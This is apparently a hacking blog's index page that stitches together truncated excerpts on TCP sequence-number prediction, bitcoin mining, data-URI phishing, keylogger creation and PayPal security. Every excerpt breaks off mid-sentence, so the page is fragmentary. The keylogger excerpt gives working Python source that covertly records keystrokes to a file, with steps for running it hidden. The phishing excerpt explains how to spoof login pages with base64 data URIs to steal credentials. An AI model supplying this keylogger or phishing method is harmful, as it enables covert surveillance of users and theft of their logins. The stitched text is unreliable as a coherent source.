Trivendra's blog

Over the past few years TCP sequence number prediction attacks have become a real threat against unprotected networks, taking advantage of the inherent trust relationships present in many network installations.   TCP sequence number prediction attacks have most commonly been implemented by opening a series of connections to the target host, and attempting to predict the sequence number which will be used next.   Many operating systems have therefore, attempted to solve this problem by implementing a method of generating sequence numbers in unpredictable fashions.   This method does not solve the problem. This advisory introduces an alternative method of obtaining the initial sequence number from some common trusted services.   The attack presented here does not require the attacker to open multiple connections, or flood a port on the trusted host to complete the attack.   The only requirement is that source routed packets can be injected into the targe

The crypto-currency has staged a meteoric rise in 2017 that has attracted new investors, but, for many, question marks still surround bitcoin and the technology behind it. Bitcoin may be the next big thing in finance, but it can be difficult for most people to understand how it works. There is a whole lot of maths and numbers involved, things which normally make a lot of people run in fear. Well, it’s one of the most complex parts of Bitcoin, but it is also the most critical to its success. The frenzied Bitcoin boom has sparked comparisons to a financial bubble, with its price soaring to more than $15,616.01 (£11662.04). But the cryptocurrency craze has also resembled something of a digital gold rush. With a finite supply of 21 million Bitcoins, tech-savvy individuals and a handful of fast-moving companies have jumped in to harvest as much of the new gold as possible, using powerful computers to hoard as much of the supply as possible. What is bitcoin mining? Just as gold

Today I'm going to show you how hackers doing phishing attack by using Data URI technique. Before going to read the article, I recommends you to read about Phishing for better understanding of this technique. Phishing by data URI is a simple technique used to steal login credentials and personal information from the users. Usually, phishing website needs a host, but by using “Phishing By Data URI” technique an attacker don't need a host to carry out an attack. In this technique, attacker uses a simple URI scheme to present media content in the web browser without the actual data on the Internet. The URI scheme is given below : data :[<mediatype>][;base64];<data> For Example : data:text/html;base64,RWZmZWN0SGFja2luZw== In the above example, I used base64 encoding to obfuscate the data from the victims. Otherwise, it looks like this : data:text/html;,EffectHacking Hackers with malicious intent can spoof an entire web-page using this technique a

Keylogger also called keystroke logging, are software programs or hardware devices that record keys struck on the computer keyboard of an individual computer user or network of computers.It almost records every keystroke that user typed and saved as a text file Keylogger Creation Just open the notepad and copy paste the script. import pyHook, pythoncom, sys, logging # feel free to set the file_log to a different file name/location  file_log = 'keyloggeroutput.txt'  def OnKeyboardEvent(event):  logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s') chr(event.Ascii)  logging.log(10,chr(event.Ascii))  return True  hooks_manager = pyHook.HookManager()  hooks_manager.KeyDown = OnKeyboardEvent  hooks_manager.HookKeyboard()  pythoncom.PumpMessages() 2. Now save it something filename.pyw and execute the keylogger file. When you need to quit logging, open up task manager and execute all the “python” forms. At that

Since its birth in 1998, eBay owned company PayPal has become a hugely popular internet banking company, as the brand-new idea of sending money to anyone in the world through Email has won hearts of millions of internet users worldwide, the number of members of PayPal has been skyrocketing since. PayPal is now by far the most successful internet banking company. However, insecurity on the internet has been a great problem since the beginning of the boom of the dotcom economy; all famous computers companies have been victims of hackers from around the globe due to security flaws in its system. Microsoft is recent victim of the W32.Blaster.Worm virus which has been identified that could allow an attacker to compromise a computer running Microsoft Windows and gain control over it. Microsoft took immediate action after the spread of the virus, however, a considerable amount of computers worldwide have been victimized and the Blaster Worm is still at large. More information on